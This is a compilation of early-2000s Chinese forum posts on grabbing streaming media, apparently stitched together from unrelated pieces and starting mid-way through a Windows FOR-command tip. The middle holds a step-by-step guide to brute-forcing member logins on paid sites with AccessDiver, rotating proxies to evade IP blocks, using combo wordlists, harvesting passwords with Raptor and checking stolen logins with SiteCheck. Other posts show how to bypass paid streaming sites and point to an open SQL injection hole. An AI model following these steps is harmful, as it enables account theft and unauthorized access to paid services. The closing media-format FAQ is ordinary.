g:\mp3\Archived\05-18-01-A\王菲-寓言\王菲-彼岸花.mp3
g:\mp3\Archived\05-18-01-A\王菲-寓言\王菲-不愛我的我不愛.mp3
......


如果我只要歌名（不要路徑和".mp3"）：



游鴻明-01 下沙
游鴻明-02 21個(gè)人
......
王菲-阿修羅
王菲-彼岸花
王菲-不愛我的我不愛
......


那么可以用FOR命令：



for /r g:\mp3 %a in (*.mp3) do @echo %~na


凡是 %~ 開頭的操作符，都是文件名的分離操作。具體請(qǐng)看 for /? 幫助。

本文舉的例子有些可能沒有實(shí)際用處，或可用其它辦法完成。僅用于體現(xiàn)FOR可以不借助其它工具，僅用DOS命令組合，就可完成相當(dāng)靈活的任務(wù)。
彩虹頻道+香港有線+新東寶+臺(tái)灣ashow（這下這幾個(gè)站完了）
1.彩虹頻道使用方法
a.首先進(jìn)入http://rtv.aboutmedia.com.tw/et-rtv/vod.asp
選擇你要收看的片子，然後選擇“隨選視頻“，點(diǎn)擊鼠標(biāo)右鍵，
選擇“複製快捷方式“，找到其中“filename=AJL1-01381_300k"，
拷貝其中的“AJL1-01381_300k”的東東。
b.把你拷貝的“AJL1-01381_300k“加在以下三個(gè)mms服務(wù)其中的任何一個(gè)的後面，並且加上“asf"
如mms://210.58.100.110/rtvrot/AJL1-01381_300k.asf mms://210.58.100.111/rtvrot/AJL1-01381_300k.asf mms://210.58.100.112/rtvrot/AJL1-01381_300k.asf
不好意思剛才我在AJL1-01381_300k.asf多加了引號(hào)，現(xiàn)在糾正
c.好了，大功告成了，現(xiàn)在你就可以看影片了，如果某部看不起，可能是
文件丟失了，你可以換一部來(lái)看。(注意：請(qǐng)大家儘可能的輪流使用三臺(tái)
mms服務(wù)器，這樣可減輕負(fù)載，不容易掛掉

2.新東寶使用方法:
和彩虹頻道的一樣，只是在地址中，你要改變r(jià)tvrot為
schannelrooot才行。
http://www.s-channel.com.tw/

3.iadultzone使用方法：
這是香港有線臺(tái)的節(jié)目，速度很快。我把地址給出了 mms://61.10.2.59/iadultzone/jp/40min/300k/ic-40-0046-b.asf
你可以改變“ic-40-0046-b.asf"中的0046。
當(dāng)然這些是40幾分鐘的日本片，你可以到
去注冊(cè)一個(gè)，登陸後，選擇“日視溫柔“進(jìn)入，裡面的每部片子
都有像“ic-40-0046“這樣的影片序號(hào)，但是一些是10或20分鐘的
這樣，你只要改變“40min"為“10min”或者“20min“
並且改變“ic-40-0046"中的“40“為“10“或者“20“就好了
好要注意後面要加上“-b“。
盡量使用三個(gè)mms服務(wù)器，另外兩個(gè)是61.10.2.52和61.10.2.53
http://www.iadultzone.com/

4.http://www.ashow.tv的使用方法：/
這是用流媒體嗅探軟件（Project URL Snooper）
的方法，上次有人介紹了的，我在這裡就不說(shuō)了 。

5.在線電視mms://203.133.6.195/gtv39nch mms://203.133.6.195/gtv52hota mms://203.133.6.195/gtv91schd
這裡要說(shuō)明一下：上次有人公布的只是其中一臺(tái)mms服務(wù)器，這是另外一臺(tái)
ip地址是不一樣。

6。後記

a.注意：1.2.3都是非流媒體技術(shù)搞出來(lái)的，

其中mms://203.133.6.195/gtv39nch也是嗅探器探不出來(lái)的
你可以用嗅探軟件去試一下，看看能行ㄇ？

b.注意：新東寶還存在sql漏洞，有興趣的朋友可以去試一下。
並且新東寶中的在線電視可以用sql漏洞進(jìn)去後，用嗅臺(tái)器可以探出真實(shí)地址
（不要誤會(huì)，前三個(gè)不是用sql漏洞搞出來(lái)的真實(shí)地址）


注意：有人反映說(shuō),去下載了後變?yōu)?wmv的文件不能播放。的確，它是通過(guò)認(rèn)證加密的，所以請(qǐng)大家不要再花時(shí)間去下載，白費(fèi)時(shí)間，如果是可以看的，我也早就告訴大家了，所以，大家還是按我以上所說(shuō)的方法去做！


收費(fèi)網(wǎng)站破解


收費(fèi)網(wǎng)站破解全攻略 1、談到破解，當(dāng)然需要一個(gè)工具，在這方面我們不得不承認(rèn)國(guó)外的破解工具勝過(guò)國(guó)貨，我以前用過(guò)流光等一些黑客工具。在破解網(wǎng)站的能力上十分有限。所以我在這里向，大家推薦一個(gè)破解工具AccessDivehttp://www.accessdiver.com/download/ad4.76.exe，下載安裝后。當(dāng)然現(xiàn)在需要的是我們破解的對(duì)象，也就是網(wǎng)站了。首先大家需要找到網(wǎng)站members的入口地址，舉個(gè)例子我們?cè)谙旅孢@個(gè)網(wǎng)頁(yè)中看到了members only的標(biāo)志 http:// 64611 ;那么我們就可以把鼠標(biāo)放到members only上面然后點(diǎn)右鍵，點(diǎn)復(fù)制快捷方式，這樣我們就得到了我們要破解的網(wǎng)址了。我們把這個(gè)http://www.xxx.com/members/index.html復(fù)制到破解工具AccessDiver最頂端SERVER后面的的那個(gè)長(zhǎng)方框里面。ok！！第一步就完成了。
呵呵！！很多朋友聽到這里可能覺得，這么簡(jiǎn)單啊！！你還用那么長(zhǎng)時(shí)間才學(xué)會(huì)，真是笨，其實(shí)這只是剛剛開始，接下來(lái)跟著我一起繼續(xù)破吧！
我們破解確實(shí)很爽。別人開網(wǎng)站的就到了霉，如果那一天發(fā)現(xiàn)我們的ip破他的網(wǎng)站，他肯定會(huì)拚了老命也要把我們逮出來(lái)。所以這里就要說(shuō)到破解的安全性了。也就是proxy的使用，請(qǐng)大家在AccessDiver的界面點(diǎn)proxy然后在 USE WEb proxies前面的方格里打勾，看到Rotate proxies了吧？繼續(xù)在它前面的方格你打勾，然后你會(huì)看到在Rotate proxies與logins to try before swapping 之間又出現(xiàn)一個(gè)方格，然后在里面填上 1 。這個(gè)選項(xiàng)是說(shuō)我們每用完一個(gè)proxies后然自動(dòng)換另一個(gè)，這是保證破解質(zhì)量的一個(gè)重要因素。因?yàn)橐恍┚W(wǎng)站在安全系統(tǒng)方面已經(jīng)改進(jìn)了很多，如果你用一個(gè)ip（代理）破解它的網(wǎng)站，不到1分鐘。便死悄悄了。。。。所以下面我們就需要一個(gè)所謂的proxylist.我在這里可以向大家提供一個(gè)list，大家把它保存在自己的硬盤后，然后用proxyhunter把它們檢驗(yàn)一遍。把好的代理（proxies）保留在一個(gè)文檔，然后在界面proxy--my list的最右邊點(diǎn)擊那個(gè)黃色文件夾的標(biāo)志，我們就可以把剛才存檔的proxy文檔輸進(jìn)去了。然后對(duì)著最上面“黑色的勾“點(diǎn)右鍵就把所有的proxy選擇了，最后在任意一個(gè)proxy上點(diǎn)一下，也就算把proxy的準(zhǔn)備工作結(jié)束了。
最關(guān)鍵的時(shí)刻來(lái)到了，做完最后一部我們就可以開始破他了！也就是我們常說(shuō)到的字典了，字典對(duì)于破解網(wǎng)站有著不言而喻的關(guān)鍵作用，字典如果選得不好，你就算從你的蟲蟲沒長(zhǎng)好開始破一直破到你老眼昏花都是無(wú)濟(jì)于事的。那么今天我在這里會(huì)向大家貢獻(xiàn)一個(gè)wordlist(字典），以后大家就要自己來(lái)leech wordlist.這里我不作詳細(xì)介紹，具體的方法我會(huì)在大家對(duì)這個(gè)破解工具比較熟悉的情況下繼續(xù)介紹。好的。點(diǎn)Dictionary在點(diǎn) Curently used，然后點(diǎn)load a comb file把我給你的wordlist輸進(jìn)去吧！！
哈哈！！終于快寫完了，大家也快見到曙光了。我們現(xiàn)在就可以開始了。記住上面的每一步你都要照做，否則開始不了不要找我！！如果你之前得每一部都搞定，那么我們就點(diǎn)
AccessDiver界面左上方黃色的Standard鍵，嘿嘿！！應(yīng)該開始了吧！如果沒有，就是你的proxy的問題。那么到proxy--my list 選項(xiàng)里選擇一個(gè)其他的proxy在開始。
基本上最基本的方法我寫完了，第一次肯定不會(huì)順利。要知道我第一次破出密碼是看了文章后的一個(gè)星期左右啊！你們比我幸運(yùn)，至少看得是中文呀！時(shí)間肯定比我少，但是破不出來(lái)也不要傷心，自己慢慢的研究。
關(guān)于對(duì)proxy設(shè)置的重要補(bǔ)充：
就是首先大家要把my skill選成expert.
然后然后在 USE WEb proxies前面的方格里打勾
看到Rotate proxies了吧？繼續(xù)在它前面的方格你打勾，然后你會(huì)看到在Rotate proxies
與logins to try before swapping 之間又出現(xiàn)一個(gè)方格，然后在里面填上 1

在proxy skipping
下面有四個(gè)框，在前3個(gè)框上打勾。
在proxy handing下第一個(gè)框前打勾
在試試吧！
回復(fù)就是動(dòng)力！

密碼研究三：密碼破解有關(guān)問題
以下軟件可http://www.icuming.com/members/下載，登陸的用戶名和密碼是tester。
我會(huì)繼續(xù)更新這份幫助。

一，SiteCheck

這個(gè)軟件用來(lái)檢測(cè)你手中已有的password是否可用。首先將你看來(lái)的或者自己破解的password統(tǒng)統(tǒng)copy & paste進(jìn)一個(gè)文本文件，每行的格式如下www.victim.com/members/www.victim.com/members/> target=_blawww.victim.com/members/www.victim.com/members/www.victim.com/members/>www.victim.com/members/>http://usernameawww.victim.com/members/ ;
然后打開sitecheck，選中這個(gè)文本文件，填上一個(gè)proxy，選擇test hacked sites，它給開始檢測(cè)，如果password失效，就清除掉，留下仍然可用的password，檢測(cè)完可以保存。

注意，如果你有同一個(gè)站點(diǎn)的多個(gè)password，最好不要用這個(gè)軟件檢測(cè)，因?yàn)樗荒茏詣?dòng)更換代理，所以可能被站點(diǎn)block掉你的ip，這樣所有的密碼都會(huì)被認(rèn)為失效。

二，Raptor
wordlist是cracker最寶貴的東西，如同少女的第一次。隨著對(duì)crack的不斷深入，就會(huì)發(fā)現(xiàn)實(shí)際上很多時(shí)間都是用來(lái)尋找，處理，完善自己的wordlist。如果你希望從網(wǎng)上眾多的破解網(wǎng)站leech password，或者將自己wordlist里重復(fù)的login去除掉，或者做出一份指定格式的wordlist，我想你需要一個(gè)好的password軟件，這就是raptor。

raptor的功能很多，界面也非常友好（我很少見到界面如此友好的黑客軟件），所以我不打算一一介紹如何使用，只介紹最常用的幾個(gè)功能：

1,打開一個(gè)wordlist，選"remove duplicates"，去除掉所有重復(fù)的login。
2，"pass leech"里填加一個(gè)破解網(wǎng)站的地址，或者倒入一個(gè)list，大家可以把scheisse給出的破解網(wǎng)站地址保存為一個(gè)txt，然后在raptor里導(dǎo)入，然后選擇start,開始leech password，對(duì)新手來(lái)說(shuō)，這是得到wordlist最簡(jiǎn)單的辦法。
3，在filter里，可以指點(diǎn)用戶名和密碼的長(zhǎng)度，大小寫等格式，從而得到一份你想要的wordlist。

其他還有合并wordlist文件，生成adultcheck,agecheck密碼文件等強(qiáng)大功能，建議新手好好熟悉這個(gè)軟件，只要你有興趣crack，就離不開這個(gè)軟件。
最好找個(gè)代理服務(wù)器

。。。。。。。。。。。。。。。。。。。。


破解在線電影多種技巧

妙用騰訊的瀏覽器找到在線電影地址！
騰訊的QQ大家都知道吧，那它的瀏覽器解決看不到原代碼的問題卻是再好不過(guò)了
有的網(wǎng)站會(huì)把電影作為一個(gè)窗口單獨(dú)彈出，如果我們用IE打開的話它的IE地址和菜單欄就看不到了，我們就用騰訊的瀏覽器就可以將其破解！Let'''''''' Go!
利用IE單獨(dú)彈出的電影對(duì)話框，我們發(fā)現(xiàn)它已經(jīng)將所有的信息欄屏蔽了，而用騰訊瀏覽器就不同了，它的各種信息欄一個(gè)都不少（雖說(shuō)這個(gè)地址一般都是假的）。既然是假的怎么辦？不用急！破解：點(diǎn)擊“查看”→“查看源文件”在彈出的文本框中找出電影地址就OK了！
-------------------------------------------------------------------------------

破解網(wǎng)頁(yè)禁用鼠標(biāo)右鍵絕招(3種)
第一種情況，出現(xiàn)版權(quán)信息類的，破解方法：在頁(yè)面目標(biāo)上按下鼠標(biāo)右鍵，彈出限制窗口，這時(shí)不要松開右鍵，將鼠標(biāo)指針移到窗口的“確定”按鈕上，同時(shí)按下左鍵。松開鼠標(biāo)左鍵，限制窗口就被關(guān)閉了，再將鼠標(biāo)移到目標(biāo)上松開鼠標(biāo)右鍵，哈哈，就這樣彈出了鼠標(biāo)右鍵菜單，限制被取消了！有成就感吧！

第二種情況，出現(xiàn)“添加到收藏夾”的。破解方法：在目標(biāo)上點(diǎn)鼠標(biāo)右鍵，出現(xiàn)添加到收藏夾的窗口，不要松開右鍵，也不要移動(dòng)鼠標(biāo)，而是使用鍵盤的TAB鍵，移動(dòng)到取消按鈕上，按下空格鍵，這時(shí)窗口就消失了，松開右鍵看看，右鍵又恢復(fù)了！

第三種情況，超鏈接無(wú)法用鼠標(biāo)右鍵彈出“在新窗口中打開”菜單的。用這一招：在超鏈接上點(diǎn)擊鼠標(biāo)右鍵，彈出窗口，不要松開右鍵，按鍵盤上的空格鍵，窗口消失了，這時(shí)在松開右鍵，右鍵菜單便會(huì)出現(xiàn)，選擇其中的“在新窗口中打開”就OK了！

------------------------------------------------------------------------------------
在有的網(wǎng)站的在線電影是彈出一個(gè)頁(yè)面，那鑲了一個(gè)real的播放器，看不到下載的地址，有一個(gè)很笨但是很有效的方法可以看到rtsp地址，就是【斷線】，雖然很簡(jiǎn)單，但是很有效，起碼可以下載下來(lái)本地觀看了！具體方法如下

可以用這個(gè)地址做試驗(yàn) !
http://www.rw.uestc.edu.cn/movie/play.asp?id=428

進(jìn)入頁(yè)面以后先暫停，如果是通過(guò)網(wǎng)卡上網(wǎng)（如cable）的化，在win98（2k不行）的開始運(yùn)行菜單里面輸入winipcfg然后回車，會(huì)出現(xiàn)一個(gè)“ip配置”，然后按播放鍵，等到播放的的緩沖進(jìn)度剛剛出來(lái)的時(shí)候就按“ip配置”對(duì)話框中的“全部釋放”，這樣就斷線了，就會(huì)出現(xiàn)rtsp地址，原理很簡(jiǎn)單，就是讓網(wǎng)頁(yè)找到要播放的以后斷線，軟件會(huì)報(bào)搞出錯(cuò)，有了出錯(cuò)的地址就可以下載了！大家試試吧！
這樣雖然很簡(jiǎn)單，但是很有效，大多數(shù)都可以用這個(gè)方法，大家不要忘記了，把一些片子都貼上來(lái)，一起分享吧！

Win2000下也可以釋放IP的，用IPCONFIG 看看它的HELP吧 。


------------------------------------------------------------------------------
如何破解在線電影網(wǎng)站的電影地址

風(fēng)月網(wǎng)http://www.fyvod.com/是一個(gè)速度很快的在線電影網(wǎng)，要盜鏈它的電影地址，

破解辦法:例如要看《訓(xùn)練日》文件的地址

頁(yè)面地址為[URL]http://202.103.220.145/display.html?ID=387[URL]

把后半部分替換成 player.html?ID=387

也就是 [URL]http://202.103.220.145/player.html?ID=387[URL]

查看源文件，控件對(duì)象是[URLmms://202.103.220.145/ [URL]

就出來(lái)了。

--------------------------------------------------------------------------------
保存在線欣賞的流媒體文件

Realplayer、Windows Media Player 可以說(shuō)成了我們的左右手。
一次在一個(gè)明星網(wǎng)站上在線欣賞廣告。有個(gè)廣告很好看，想保存起來(lái)。但這不是平時(shí)經(jīng)常看的rm。而是一種asx文件。點(diǎn)擊之后，就會(huì)打開 Windows Media Player 連接網(wǎng)絡(luò)進(jìn)行播放。而將這個(gè)asx文件下載來(lái)后，一看只有300KB左右，奇怪了，一個(gè)廣告怎么可能就這么一點(diǎn)。用記事本寫篇短文也不止300 K，百思不得其解，用記事本打開asx文件看看吧。

果然不錯(cuò)，內(nèi)容就是Html代碼，稍懂HTML的網(wǎng)友便會(huì)知道當(dāng)中最核心的是鏈接，如：
[URLmms://video.andylau.com/andylau/others/061901_makinggreenteatvc2_100k.asf [URL]
原來(lái)這個(gè)asx指向的是一個(gè)微軟大力推廣、用來(lái)和Real公司‘較量’的網(wǎng)絡(luò)流媒體格式.asf。圖象質(zhì)量個(gè)人認(rèn)為比rm好。

好了，現(xiàn)在要保存是不是很簡(jiǎn)單，對(duì)了，把前面的mms改成http，然后把他粘貼到FlashGet（網(wǎng)際快車）中下載吧。看到綠色波浪了吧！
-------------------------------------------------------------------------------
mms協(xié)議電影下載指南

因有些電影所采用的是mms協(xié)議，用一般的下載工具就不能用了，但可以在線觀看。

但有了這個(gè)工具后就不能提心mms協(xié)議的電影不能下載的問題了。
[URL]http://chinagamelab.www9.cn4e.com/soft1000/soft/asfr.zip[URL]
或
[URL]http://www.chinawolf.com/~dodotom/tools/asfr.zip[URL]

使用方法：
解壓這個(gè)壓縮包，把里面的asfr.exe這個(gè)文件拷貝到你的D盤。再在運(yùn)行欄里輸入command（假如你是win2000的話，就在開始菜單里選擇附件中的命令提示符)假如你所要下的電影地址為
[URLmms://www.chinawolf.com/~dodotom/01.asf [URL]這時(shí)你就在MS－DOS窗口中輸入D:進(jìn)入D盤后(因?yàn)閍sfr.exe在D盤)輸入 asfr [URLmms://www.chinawolf.com/~dodotom/01.asf[URL](這樣MS－DOS窗口中就在連接你所要下載的電影服務(wù)器，然后開始自動(dòng)下載了。電影下完后在DOS窗口中會(huì)出現(xiàn)英文提示你已完成下載字樣。這樣一個(gè)mms協(xié)議的電影就被你下載下來(lái)啦。

------------------------------------------------------------------------------
下載電影的好東東　　
NetMoles Downlor2.4(網(wǎng)絡(luò)鼴鼠):
最新版本：2.4
文件大小：2143KB
軟件授權(quán)：共享軟件
使用平臺(tái)：Win9x/Me/NT/2000

最新的網(wǎng)絡(luò)媒體下載軟件，用法與“網(wǎng)際快車”差不多，不但支持http;ftp格式，還可下載mms的在線電影，下載速度比vcr要快。該軟件具備以下功能：1.將文件分成多個(gè)部分同時(shí)下載，通過(guò)多線程，斷點(diǎn)續(xù)傳等技術(shù)最大限度地提高下載速度。2.為了有效地管理下載的文件，可以創(chuàng)建不同的類別，把下載的軟件分類存放。3.下載的任務(wù)可以根據(jù)相應(yīng)的信息進(jìn)行排序，查詢。4.改進(jìn)FlashGet和Netants等軟件對(duì)同一FTP主機(jī)的文件下載的方法(請(qǐng)看幫助文件)。 新版本增加對(duì)了mms/mmst/mmst協(xié)議的支持

下載地址：
[URL]http://gz.onlinedown.net/down/NetMoles_Downloader_2_4_full.rar [URL]


-----------------------------------------------------------------------------
[轉(zhuǎn)貼] 下載實(shí)時(shí)播放的流節(jié)目完全教材（高、中、初級(jí)指南）

一、初級(jí)篇——下載隱藏的ASF與MWV文件
　ASFRecorder V1.1是一個(gè)專門用來(lái)下載ASF、Wma、Wmv格式流文件的工具。它除了能把ASF下載回來(lái)外，也支持ASF文件的索引格式ASX文件，它能把隱藏在ASX里面的真正流部分找出來(lái)，甚至還可以設(shè)置代理等等，功能強(qiáng)大之余使用也非常方便。只要在其[File]菜單下面選[Open URL]再輸入流節(jié)目的地址后就可以回到主界面按那個(gè)三角形符號(hào)開始下載了。

　　最近還出現(xiàn)了另外一個(gè)流節(jié)目下載軟件 Stream Download Project v1.4 ，它的功能和 ASFRecorder非常的相似，一樣是只支持ASF和WMV格式，一樣不支持多線程下載和續(xù)傳。但它畢竟是比較新的軟件，在一些 Streambox Vcr都不能成功下載的情況下，用這個(gè)軟件試試或者會(huì)讓你有柳暗花明的感覺。

二、中級(jí)篇——下載隱藏的RM文件
Streambox Vcr不但支持點(diǎn)播形式的流節(jié)目也同樣支持現(xiàn)場(chǎng)流節(jié)目，而且兩者可以同時(shí)下載！由于它采用了獨(dú)特的分析技術(shù)，所以可以把那些隱藏在ASX后的ASF文件和隱藏在SMIL文件后的RM文件找出來(lái)并進(jìn)行下載。這個(gè)功能雖然在ASFRecorder里面已經(jīng)實(shí)現(xiàn)，但真正做到實(shí)用階段的是Streambox Vcr！另外，Streambox Vcr支持的流播放協(xié)議相當(dāng)齊全，http、ftp、rtsp、mms、pnm等能數(shù)得出的協(xié)議它都全部支持并可以在下載的時(shí)候自動(dòng)判別。除此之外它支持?jǐn)嗑€續(xù)傳、支持定時(shí)下載、支持拖放下載等等作為下載軟件必要的功能它一樣沒少，夠吸引的吧！


三、高級(jí)篇——下載受保護(hù)的流媒體文件

　　對(duì)于一些隱藏得更深、保護(hù)得更完善的流文件，StreamBox vcr因找不到真實(shí)地址而無(wú)法下載。這個(gè)時(shí)候，我們就需要用另外的軟件來(lái)分析、整理出真實(shí)的地址了。既然流文件用播放器能播放，那么真實(shí)地址一定是隱藏在發(fā)送到本機(jī)的網(wǎng)絡(luò)數(shù)據(jù)包里面。所以只要用軟件截獲網(wǎng)上發(fā)送過(guò)來(lái)的數(shù)據(jù)包，然后加以分析就一定可以找得到真實(shí)地址。現(xiàn)在出現(xiàn)了一個(gè)專門是用來(lái)和StreamBox vcr等軟件配合的地址嗅探軟件Project URL Snooper


另外最近又發(fā)現(xiàn)一款不錯(cuò)的下載電影工具～

新的流媒體下載軟件支持http/ftp/mms/mmst/mmsu協(xié)議(與Streambox Vcr相輔相成）
NetMoles Downloader 版 本 2.3 版權(quán)所有 軟件發(fā)行商
軟件平臺(tái) Win9x WinNT Win2000 WinME WinXP 整理日期 2002-03-25
軟件授權(quán) **
軟件大小 1950KB
軟件簡(jiǎn)介 NetMoles Downloader 是一支持http/ftp/mms/mmst/mmsu協(xié)議的下載軟件。該軟件能充分支持多代理，突破越來(lái)越多的網(wǎng)絡(luò)限制，同時(shí)改進(jìn)FlashGet和Netants等軟件對(duì)同一FTP主機(jī)的文件下載的方法，使你更方便地下載各種軟件。目前軟件的功能包括:1.將文件分成多個(gè)部分同時(shí)下載，通過(guò)多線程，斷點(diǎn)續(xù)傳等技術(shù)最大限度地提高下載速度。2.為了有效地管理下載的文件，可以創(chuàng)建不同的類別，把下載的軟件分類存放。3.下載的任務(wù)可以根據(jù)相應(yīng)的信息進(jìn)行排序，查詢。4.改進(jìn)FlashGet和Netants等軟件對(duì)同一FTP主機(jī)的文件下載的方法。5.支持MMS協(xié)議的中文名、有密碼保護(hù)的mms文件等。5.支持多代理，以及對(duì)代理的批量導(dǎo)入、導(dǎo)出、測(cè)試 1.rm格式的文件能下載下來(lái)嗎？
答：當(dāng)然了，用streamboxvcr就可以，這個(gè)軟件的套裝可以在本站找到，名字是streamboxvcrsuite1.0。

2.能將mpeg文件直接轉(zhuǎn)換成wmv（wm8）格式的嗎？
答：至今為止還不行，還是要經(jīng)過(guò)avi的中間步驟的.....不過(guò)可以讓幾個(gè)軟件協(xié)同工作來(lái)提高工作效率，當(dāng)然你還是要準(zhǔn)備一塊大硬盤的。

3.我用StreamBox下載的ASF文件，播放時(shí)快進(jìn)后退鍵全都失效。
答：有兩個(gè)方法來(lái)解決：（1）用windows media player6.4來(lái)播放，就可以正常拖動(dòng)了；（2）把a(bǔ)sf文件用virtualdub轉(zhuǎn)換成avi文件后便可以在mediaplayer7.0里看了，而且可以選段看，且不會(huì)等候，只是7.0占用資源比較高，建議還是用6.4看。

4.如何把rm文件轉(zhuǎn)換為mpg文件？
答：現(xiàn)在還沒有比較完美的解決辦法，能湊合用的辦法有兩個(gè)：（1）用抓屏軟件，例如hypercam，snagit等等，抓取播放中的video/audio成為avi文件，這個(gè)過(guò)程中可以選擇codec，所以可以適當(dāng)?shù)臏p小avi的大小，之后可以把a(bǔ)vi->mpg；（2）用tira直接轉(zhuǎn)換rm->avi，不過(guò)你也要準(zhǔn)備個(gè)大硬盤，因?yàn)檗D(zhuǎn)化出來(lái)的是沒有壓縮的avi。

5.wmv8中在壓縮設(shè)定的時(shí)候一項(xiàng)叫做two-pass，是做什么用的？
答：第一次所謂的編碼就是做分析。即對(duì)整個(gè)被制作的video進(jìn)行掃描，以確定video中哪些鏡頭是相對(duì)動(dòng)態(tài)，哪些鏡頭是相對(duì)靜態(tài)！因?yàn)橄鄬?duì)靜態(tài)的片段需要的碼流速率相對(duì)低甚至低很多，這樣他就利用一定的算法把臨近相對(duì)動(dòng)態(tài)的片段部分的數(shù)據(jù)插進(jìn)來(lái)。插進(jìn)來(lái)的數(shù)據(jù)和一般數(shù)據(jù)一同被LOAD進(jìn)BUFFER，回放的過(guò)程中再插回動(dòng)態(tài)的畫面中。這樣就巧妙的利用時(shí)間差充分的利用帶寬使得動(dòng)態(tài)效果達(dá)到最好！于是所謂的first pass就是分析并判斷video轉(zhuǎn)換成數(shù)據(jù)流的“均衡”，然后second pass才是真正利用first pass中分析的結(jié)果開始encode！由于需要經(jīng)過(guò)這兩個(gè)過(guò)程所以two pass encording所需要的時(shí)間大約是普通編碼時(shí)間的兩倍！real在VBR和two pass技術(shù)上的成熟，所以盡管MS最近在MEDIA8中宣稱也利用了以上的兩種技術(shù)，但在動(dòng)態(tài)的VIDEO上的表現(xiàn)任遠(yuǎn)遠(yuǎn)不及REAL。在大動(dòng)態(tài)的鏡頭中體現(xiàn)得更加明顯，MS''VIDEO8容易產(chǎn)生大量馬塞克，而real就處理得很平滑而且動(dòng)作也更連貫！

6.stream vcr應(yīng)該設(shè)置怎樣的代理服務(wù)器？
答：在菜單里面就有的：view->setting->proxy。

7.請(qǐng)問如何用把超過(guò)700Mb的asf文件切成小的asf？

答：其實(shí)最好在制作asf的時(shí)候就把這個(gè)計(jì)算好（類似于divx的bitrate的計(jì)算）。可以用asfindexer（這個(gè)軟件在windows media tools4.1里面有）試試。

8.請(qǐng)問rm文件用什么軟件編輯？
答：你只要裝上了RealProducer8.5plus，就可以編輯了。菜單File-Edit RealMediafile...

9.請(qǐng)問怎么把多個(gè)RM文件合成一個(gè)完整的文件？用什么軟件？
答：方法同上，不過(guò)在進(jìn)入Edit RealMediafile里面之后要用append來(lái)追加.......

10.請(qǐng)問微軟媒體播放器播放的影片用掃描軟件抓屏，realplay的可以，但WMV等用微軟媒體播放器的為何就不行呢？
答：準(zhǔn)確來(lái)說(shuō)，WMV比REALPLAY的屏幕更難捕捉，為了顯示效果，兩個(gè)軟件都用了一些很特別的顯示方法來(lái)顯示圖形（REALPLAY和一些機(jī)器不兼容也是因此而來(lái)，這方面有系統(tǒng)代碼的MEDIAPLAY占的便宜實(shí)在太大了）。所以用一般的截圖軟件是很難截取到它們播放中的圖形的，就像以前DOS下的“直接寫屏”技術(shù)，比較極端的技術(shù)要抓起來(lái)麻煩多了，好在HyperSnap-DX Pro等軟件的DirectX支持功能還能有時(shí)候發(fā)揮點(diǎn)用處，把ASF和WMV的圖給搞定，但REALPLAY就沒辦法了。最近聽說(shuō)“東方影都”能支持RM文件播放時(shí)候的截圖，我也沒測(cè)試過(guò)，但我想如果能截就可能不是采用REALPLAY的那些顯示技術(shù)了，圖像質(zhì)量也應(yīng)該打點(diǎn)折扣了。大家看到我的文章上的截圖了吧，呵呵我是如何截REALPLAY的呢？其實(shí)是一個(gè)笨辦法，一個(gè)不算是辦法的辦法。。。也不好意思獻(xiàn)丑了。

11.請(qǐng)教一下：用下載的ASFCUT時(shí)總提示W(wǎng)MVCORE.DLL是怎么回事？
答：把WINDOWS MEDIA ENCODE7裝上就行了。

12.我用wm7作的.wmv,與asf有什么區(qū)別？
答：兩種文件采用的codec不同，wmv一般是采用window media video/audio 7的，asf采用的一般是Microsoft MPEG4 V（3/2/1?），音頻部分是windows media audio v2/1。不過(guò)現(xiàn)在網(wǎng)上有些地方的asf，wmv采用的codec有些混亂了，所以兩種文件的界限也有些模糊了。

13.我用Real Producer Plus 8.5，把VCD格式轉(zhuǎn)換成RM。但用Real Player 8，看時(shí)，就要我上網(wǎng)下載更新才能看，怎么辦？
答：請(qǐng)下載最新版本的RealPlayer8...

14.在寬帶平臺(tái)下，是rm的效果好還是asf的效果好？asf能做到mpeg4的近似DVD的效果嗎？
答：這個(gè)問題當(dāng)初提出來(lái)的時(shí)候，爭(zhēng)論了很久，各執(zhí)一詞，wmv8和rm都有支持者，看來(lái)不同的制作方法，不同的人（主觀印象？），結(jié)果只能是不同了：（所以我就順便說(shuō)說(shuō)自己的看法吧（我考慮的是低碼率，225kbps左右），rm似乎在圖像的柔和度上面下了很大的功夫，wmv8則是一上來(lái)就以圖像的清晰度見長(zhǎng)（感覺就是制作的時(shí)候把quality調(diào)到0也比rm強(qiáng)一點(diǎn)，不過(guò)似乎有些地方處理起來(lái)還是有問題，當(dāng)初曾經(jīng)壓縮過(guò)一個(gè)游戲的avi，源文件壓縮之后wmv8里面有很多的色斑，改用rm之后一切正常...

15.我用VirtualDub 1.4D在讀源文件時(shí)經(jīng)常出現(xiàn)MPEG Import Fileter:unexpected end of file在轉(zhuǎn)換為AVI時(shí)經(jīng)常出現(xiàn)sync error，為什么？
答：這個(gè)是因?yàn)槟愕膍pg源文件不是標(biāo)準(zhǔn)的mpg格式，請(qǐng)用超級(jí)解霸的mpg格式處理功能進(jìn)行轉(zhuǎn)化，出來(lái)的mpg就可以正常使用了,也可以用M1-edit（M2-edit？）來(lái)處理.....

16.請(qǐng)問各位前輩，有什么方法可以預(yù)處理.mpg文件，去出錯(cuò)誤？（當(dāng)然我的.mpg copy到handdisk時(shí)并不很順暢）
答：回答同上。

17.我用media encoder utility 8壓縮的wmv的圖像居然是反的，人物都大頭朝下了，這是怎么回事？是不是參數(shù)設(shè)置有問題？以前用wm8 beat2很正常的呀。
答：可以參看下面微軟的回答.....以下是在該產(chǎn)品幫助中的faq中有的：Why is my encoded video upside down when I play it back in Windows Media Player? Occasionally, encoded video will be upside down when it is played in Windows Media Player because capture card drivers interpret the packed YUV file format in different ways. （是由于捕獲卡驅(qū)動(dòng)解釋方面的原因）Windows Media 8 Encoding Utility enables you to set a registry key that will flip the video before encoding it so that it displays correctly. By default this feature is disabled. To enable this feature, use the registry editor to locate the registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Scrunch\WMVideo\Vertical Flip Packed YUV, and then set the DWORD valuesss of this registry key to 1。（即可以將以上鍵值改成1解決）

18.請(qǐng)問怎樣把a(bǔ)sf和wmv轉(zhuǎn)換成avi的文件？
答：如果可以用virtualdub1.3c（或者支持asf的1.4版也可以）打開的話，就簡(jiǎn)單了，video/audio都選擇direct stream copy，然后save as成avi就可以了。不過(guò)vd好像對(duì)于asf支持的好一些，我試過(guò)對(duì)付wmv好像不行。另一種方法是用graphedit來(lái)轉(zhuǎn)換，這種方法通殺wmv、asf。

19.裝了windows media player7.0之后，我還可以用windows media player6.4版本么？
答：當(dāng)然了。那個(gè)6.4版本已經(jīng)被升級(jí)成了6.4系列的最高版本了。這個(gè)程序的位置是C:\Program Files\Windows Media Player\mplayer2.exe。

